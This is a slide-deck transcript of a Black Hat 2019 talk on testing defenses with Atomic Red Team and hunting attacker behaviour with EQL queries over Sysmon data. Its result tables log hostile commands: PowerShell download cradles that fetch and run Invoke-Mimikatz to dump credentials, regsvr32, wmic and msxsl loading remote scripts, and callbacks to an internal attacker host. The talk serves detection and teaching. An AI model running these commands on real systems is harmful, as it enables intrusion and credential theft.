SlideShare ist ein Scribd-Unternehmen logo

Fantastic Red Team Attacks and How to Find Them

R
Ross Wolf

Presented at Black Hat 2019 https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540 Casey Smith (Red Canary) Ross Wolf (Endgame) bit.ly/fantastic19 Abstract: Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible. This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events. Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.

Technologie
1 von 88
Downloaden Sie, um offline zu lesen
and How to Find Them bit.ly/fantastic19
Can you detect unknown attacks?
qwinsta /server:bh-19 Casey Smith Director of Applied Research @ Red Canary Project Developer Atomic Red Team I love testing defenses Mostly Gryffindor Ross Wolf Senior Threat Researcher @ Endgame Created the Event Query Language Detector of attacker tradecraft Likely a Ravenclaw @rw_access@subTee
Agenda ● How to test with Atomic Red Team ○ Frequently missed attacks ○ How do we test security tools? ● How to hunt with Event Query Language (EQL) ○ Introduction to behavioral detection ○ Crash course with examples ● Red vs Blue ○ Exercise using EQL to finding unknown threats ○ Investigate a sample data set ○ Uncover a new attacker technique ● Conclusions bit.ly/fantastic19
Defenders want assurances their tools & methods are working
Many defenders do not know HOW to start testing, or they are not testing well. This was the reason we created Atomic Red Team.
What is Atomic Red Team? ● Open source project for testing for security controls ● YAML described tests mapped to MITRE ATT&CK™ ● Simple easy tests—many can be run in a single command line ● Demystify attacks by providing code and examples ● DOES NOT replace human red team, adversary emulation, adaptation. atomicredteam.io
Example Atomic Technique YAML attack_technique: T1118 display_name: InstallUtil atomic_tests: - name: InstallUtil GetHelp method call supported_platforms: - windows input_arguments: filename: description: location of the payload type: Path default: C:AtomicRedTeamatomicsT1118srcT1118.dll executor: name: command_prompt command: | C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? #{filename}
Easy to Automate, Chain Tests Together. Tests are benign and can be fully customized as needed.
Observations with Atomic Red Team ● Validate telemetry collection & detection logic ● Understanding your data and visibility ● Knowledge of the environment ● Detections for common techniques
Frequently Missed MITRE ATT&CK Techniques ● T1036 Masquerading ● T1047 Windows Management Instrumentation ● T1055 Process Injection ● T1118 InstallUtil ● T1127 Trusted Developer Tools ● T1170 MSHTA ● T1220 XSL Script Processing Often leverage built-in native OS tools
Prepare For Actual Incidents InstallUtil (MITRE ATT&CK T1118) https://securelist.com/using-legitimate-tools-to-hide-malicious-code/83074/ MSBuild (MITRE ATT&CK T1127) https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
Atomic Red Team May Help Organizations Prepare By introducing small, benign examples to test and practice response/coverage/hunting.
Hunting for Unknown Threats
Behaviors occur over time and we need to monitor where the action happens. We can get answers to behavioral questions with the Event Query Language.
Event Query Language ● Simple syntax designed for hunting and detection ● Supports contextual and complex behaviors ● Tracks lineage and event sequences statefully ● Filter, stack and sift through data with pipes ● Dynamic shell for querying data eql.readthedocs.io
Event Queries ● <event type> where <condition> ● and or not < <= == != >= > ● Wildcard with asterisk * ● Case-insensitive comparisons process where process_name == "svchost.exe" and not (command_line == "* -k *" or parent_process_name == "services.exe")
Sequences ● Match multiple events in order ● Shared properties with by syntax ● Timeouts with maxspan=5m ● Statefully expire sequences with until condition sequence with maxspan=<time> [ <event_type> where <condition>] by <A>, <B>, <C> [ <event_type> where <condition>] by <D>, <E>, <F>
Sequences ● Match multiple events in order ● Shared properties with by syntax ● Timeouts with maxspan=5m ● Statefully expire sequences with until condition sequence with maxspan=5m [ file where file_name == "*.exe" and user_name != "SYSTEM"] by file_path [ process where user_name == "SYSTEM"] by process_path
Join ● Multiple events without ordering ● No time limitations ● Allows by and until syntax join [<event_type> where <condition>] [<event_type> where <condition>]
Join ● Multiple events without ordering ● No time limitations ● Allows by and until syntax join [file where file_path == "*System32Tasksh4x0r.xml"] [registry where registry_path == "*runonceh4xor"]
Join ● Multiple events without ordering ● No time limitations ● Allows by and until syntax join by source_ip, destination_ip [network where destination_port == 3389] // RDP [network where destination_port == 135] // RPC [network where destination_port == 445] // SMB
Data Pipes ● Perform data stacking while hunting ● Process results by filtering, counting and removing duplicates count filter head sort tail unique unique_count process where user_name != "SYSTEM" | unique process_name, user_name | unique_count process_name | filter count == 1
Process Lineage ● Natively tracks lineage by monitoring process create and terminate ● Supports descendant of, child of, and event of relationships ● Combine or nest with other logic network where process_name == "powershell.exe" and descendant of [process where process_name in ("outlook.exe", "winword.exe", "powerpnt.exe", "excel.exe")]
DEMO
Red versus Blue
Setting the Stage ● Windows endpoint with Sysmon installed ● Real background noise ● Data exported to json.gz file Gols Blue Team Objective: Find the red team and scope the compromise Red Team Objective: Target a developer system with a unique attack
Investigative Process ● Gather an initial set of suspicious activity ○ Alerting from existing detectors ○ Hunting for evidence of compromise ● Reduce the data set until it’s manageable ● Triage results to determine good or bad ● Scope the compromise by pulling on threads
Gather Suspicious Activity
Guiding Questions ● What persistence locations are new? ● Are there unusual process relationships? ● Were there attempts to blend in? ● Did anything start behaving differently? ○ First seen network connection for a process ○ First lateral movement attempt for a user Think situational awareness + ATT&CK tactics
mutatio corporis Were any native tools renamed and executed? process where subtype.create and original_file_name != process_name and original_file_name in ( "cmd.exe", "certutil.exe", "cscript.exe", "dsquery.exe", "installutil.exe", "powershell.exe", "rundll32.exe", "wscript.exe", ) | unique original_file_name, file_name 0 results found
lolbas revello What callbacks were established from binaries used to live off the land? sequence by unique_pid [process where subtype.create and process_name in ( "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "Certutil.exe", "Cmdkey.exe", "Cmstp.exe", "Control.exe", "Csc.exe", "Cscript.exe", "Dfsvc.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Extexport.exe", "Extrac32.exe", "Expand.exe", // 61 binaries from https://github.com/api0cradle/LOLBAS/blob/master/LOLBins.md )] [network where subtype.outgoing] | unique events[0].command_line 8 results found
lolbas revello event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com
Please, you don’t understand... Nothing in there is dangerous. Triage Results
Guiding Questions ● Is the path unexpected? ● Do file names look like Windows binaries? ● Was the PE image signed? ● Is it a legitimate product? ● Has this been publically reported?
lolbas revello event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com
event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com lolbas revello ✔Atomic Testing
event_type parent_process_name process_name command_line destination process amazonAssistantService.exe mshta.exe "mshta.exe" "C:Program Files (x86)AmazonAmazon Assistantaa.hta" network mshta.exe images-na.ssl-images-amazon.com process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process cmd.exe powershell.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') network powershell.exe raw.githubusercontent.com process cmd.exe powershell.exe powershell.exe IWR -uri "https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat network powershell.exe raw.githubusercontent.com lolbas revello ✔Atomic Testing ✔ Legitimate Amazon
lolbas revello event_type parent_process_name process_name command_line destination process svchost.exe regsvr32.exe regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/ atomics/T1117/RegSvr32.sct scrobj.dll network regsvr32.exe raw.githubusercontent.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 process services.exe msiexec.exe C:Windowssystem32msiexec.exe /V network msiexec.exe oscp.digicert.com
event_type parent_process_name process_name command_line destination process svchost.exe regsvr32.exe regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/ atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/ atomics/T1117/RegSvr32.sct scrobj.dll network regsvr32.exe raw.githubusercontent.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 process services.exe msiexec.exe C:Windowssystem32msiexec.exe /V network msiexec.exe oscp.digicert.com lolbas revello ✔Atomic Testing ✔Legitimate Windows
lolbas revello event_type parent_process_name process_name command_line destination process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10
explicate parvuli What descendants were spawned from the interactive PowerShell console? process where subtype.create and descendant of [ network where event of [ process where subtype.create and parent_process_name == "explorer.exe" and process_name == "powershell.exe" ] ] 43 results found
explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line csc.exe "C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe" /noconfig /fullpaths @"C:UsersNewtScamanderAppDataLocalTempcwit4koq.cmdline" cvtres.exe C:WindowsMicrosoft.NETFramework64v4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:UsersNEWTSC~1AppDataLocalTempRES6F90.tmp" "c:UsersNewtScamanderAppDataLocalTempCSCFCD426139CD74D618CE7A9833BF7FF69.TMP" cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs " csc.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs cvtres.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:UsersNEWTSC~1AppDataLocalTempRES2728.tmp" "c:AtomicRedTeamatomicsT1118srcCSC7414F1A333B45CDB71DB995A782FCC.TMP" cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U C:AtomicRedTeamatomicsT1118srcT1118.dll" Showing results 1-6 of 43
explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line InstallUtil.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U C:AtomicRedTeamatomicsT1118srcT1118.dll cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs " csc.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /target:library /out:C:AtomicRedTeamatomicsT1118srcT1118.dll C:AtomicRedTeamatomicsT1118srcT1118.cs cvtres.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:UsersNEWTSC~1AppDataLocalTempRES2DBF.tmp" "c:AtomicRedTeamatomicsT1118srcCSC137A13BC43A744468D2FF98C3FC48643.TMP" cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? C:AtomicRedTeamatomicsT1118srcT1118.dll" Showing results 7-12 of 43
explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line InstallUtil.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? C:AtomicRedTeamatomicsT1118srcT1118.dll cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe T1127.csproj" MSBuild.exe C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe T1127.csproj cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl" cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" Showing results 13-20 of 43
explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:list" WMIC.exe wmic.exe process /FORMAT:list cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl" WMIC.exe wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl" Showing results 21-28 of 43
explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line msxsl.exe C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl calc.exe "C:WindowsSystem32calc.exe" cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" msxsl.exe C:WindowsTempmsxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl calc.exe "C:WindowsSystem32calc.exe" cmd.exe "C:Windowssystem32cmd.exe" /c Showing results 29-35 of 43
explicate parvuli What descendants were spawned from the interactive PowerShell console? process_name command_line cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:list" WMIC.exe wmic.exe process /FORMAT:list cmd.exe "C:Windowssystem32cmd.exe" /c cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl" WMIC.exe wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics cript.xsl cmd.exe "C:Windowssystem32cmd.exe" /c WMIC.exe "C:WindowsSystem32WbemWMIC.exe" os get /format:wmicscript WMIC.exe "C:WindowsSystem32WbemWMIC.exe" os get /format:wmicscript.xsl Showing results 36-43 of 43
event_type parent_process_name process_name command_line destination process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 lolbas revello ✔Atomic Testing
claves revelare What loaded the PowerShell module Invoke-Mimikatz? sequence [process where subtype.create] by unique_pid [process where subtype.create and command_line == "*Invoke-Mimikatz*"] by unique_ppid 1 result found
claves revelare What loaded the PowerShell module Invoke-Mimikatz? parent_process_name command_line cmd.exe powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/ Chain_Reactions/chain_reaction_DragonsTail.ps1') powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/ Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
lolbas revello event_type parent_process_name process_name command_line destination process explorer.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" network powershell.exe go.microsoft.com process powershell.exe powershell.exe "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString( 'https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" network powershell.exe raw.githubusercontent.com process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 ✔Atomic Testing
lolbas revello event_type parent_process_name process_name command_line destination process explorer.exe InstallUtil.exe "C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /? C:UsersNEWTSC~1AppDataLocalTemp a3541d3f-a4db-c8b0-dab7-c268095df70e.chm network InstallUtil.exe 10.10.10.10 ✘ Red Team
distincta imperium What unique PowerShell commands were seen? process where subtype.create and process_name == "powershell.exe" and command_line == "* *" | unique_count command_line 3 unique results found
distincta imperium count command_line 1 powershell.exe IWR -uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat 1 powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') 1 "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
distincta imperium count command_line 1 powershell.exe IWR -uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.bat" -OutFile "~Documentspayload.bat" ; ~Documentspayload.bat 1 powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/ chain_reaction_DragonsTail.ps1') 1 "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/ module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" ✔Atomic Testing
What files were created by non-SYSTEM users but later executed as SYSTEM? integritas campester sequence [file where subtype.create and event of [process where subtype.create and user_name != "SYSTEM"]] by file_path [process where subtype.create and user_name == "SYSTEM"] by process_path 0 results found
network where subtype.outgoing | unique process_path | tail 15 What processes recently made their first network connection? novum nexumus 15 results found
novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual StudioInstallerresourcesappServiceHubServices Microsoft.VisualStudio.Setup.ServiceBackgroundDownload.exe NewtScamander storeedgefd.dsx .mp.microsoft.com 443 C:Program FilesWindowsApps Microsoft.WindowsStore_11706.1002.9.0_x64__8wekyb3d8bbwe WinStore.App.exe NewtScamander 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander www.bing.com 443 C:WindowsSystem32BackgroundTransferHost.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander watson.telemetry .microsoft.com 443 c:windowssystem32taskhostw.exe NewtScamander vo.msecnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHub controllerMicrosoft.ServiceHub.Controller.exe NewtScamander
novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual StudioInstallerresourcesappServiceHubServices Microsoft.VisualStudio.Setup.ServiceBackgroundDownload.exe NewtScamander storeedgefd.dsx .mp.microsoft.com 443 C:Program FilesWindowsApps Microsoft.WindowsStore_11706.1002.9.0_x64__8wekyb3d8bbwe WinStore.App.exe NewtScamander 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander www.bing.com 443 C:WindowsSystem32BackgroundTransferHost.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander watson.telemetry .microsoft.com 443 c:windowssystem32taskhostw.exe NewtScamander vo.msecnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHub controllerMicrosoft.ServiceHub.Controller.exe NewtScamander ✔Microsoft ✔Microsoft ✔Microsoft
novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEdevenv.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.VSDetouredHost.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEPerfWatson2.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.Host.CLR.x86.exe NewtScamander dc.services.visualstudio.com 443 C:Program Filesdotnetdotnet.exe SYSTEM ocsp.digicert.com 80 C:WindowsSystem32msiexec.exe SYSTEM vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019Communitycommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.RoslynCodeAnalysisS ervice32.exe NewtScamander
novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEdevenv.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.VSDetouredHost.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEPerfWatson2.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.Host.CLR.x86.exe NewtScamander dc.services.visualstudio.com 443 C:Program Filesdotnetdotnet.exe SYSTEM ocsp.digicert.com 80 C:WindowsSystem32msiexec.exe SYSTEM vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019Communitycommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.RoslynCodeAnalysisS ervice32.exe NewtScamander ✔Microsoft
novum nexumus destination port process_path user_name 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander
novum nexumus destination port process_path user_name 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander ✘ Red Team
novum nexumus destination port process_path user_name 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander ✘ Red Team
Scoping
nota vocatio Why is notepad.exe making outbound network connections? sequence by unique_pid [process where process_name == "notepad.exe"] [network where subtype.outgoing] process_name event_type subtype parent_process_path destination notepad.exe process create C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe notepad.exe network outgoing 10.10.10.10 notepad.exe process create C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe notepad.exe network outgoing 10.10.10.10
nota vocatio What else did dbgsrv.exe do? any where event_type in ("process", "network", "file", "registry") and process_name == "dbgsrv.exe" | unique unique_pid, event_type, subtype 7 results found
